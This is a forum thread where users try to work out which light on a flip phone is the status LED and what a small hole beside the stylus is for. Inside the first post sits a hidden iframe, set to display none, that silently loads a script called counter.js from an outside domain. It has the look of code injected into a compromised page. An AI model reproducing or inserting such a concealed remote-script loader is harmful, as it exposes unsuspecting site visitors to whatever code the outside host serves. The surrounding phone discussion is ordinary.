According to the reference guide and user manual...they both show the LED light (blinking green, amber, red showing the ERI as to whether its in the home, roam, or no service areas) next to the stylus towards the very top where the caller ID is to the right of it. Am i wrong...or isn't the LED the tiny light going vertically down the face of the closed portion of the flip phone kinda at the front hinge???
(On phonescoop.com, it shows the light as green the one that I believe is the true LED light on the phone on the front when the flip is closed...aka picture 3 of the 1-5.)
Please help!
P.S. Minor i know...just can't quite see the other thing they point to (next to the infrared and LCD outer screen as the LED...)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I'm not concerned as I said it's minor....i'm just simply curious if the LED is indeed the green light shown in pic 3 of 5 on phonescoop.com to see if i'm right about it..
No it sounds like the MANUALS are talking about the IR port...like i said they point to the top of the phone near the lcd screen and sylus area. I believe the led is the green light shown in pic 3 of 5 on this link:
That is the LED right??? The green light shown in pic 3...It appears that the green light in the pic is definately the LED status (located on the HINGE... NOT the top of the phone where the caller ID screen is located)
The reason I'm not assured of this....if you look at either the users manual or reference guide...they point to the little thing located directly the the right of the stylus holder...they point to that as the LED status light which is clearly wrong! Any idea what the little thing is just to the very upper right of the stylus?
It appears to be for a wrist strap. If you look at the back of the phone, there's another (slightly larger) whole in the same position that connects to the smaller one directly to the right of the stylus. Directly below the stylus is the IR port.
lol this is like deciphering hieroglyphics-- Lets try another one...... Has anybody figured out if the picture attached above is using a CG fabricated "phonescoop" logo is there some sort of logo hack to display your custom graphics on the external LCD?
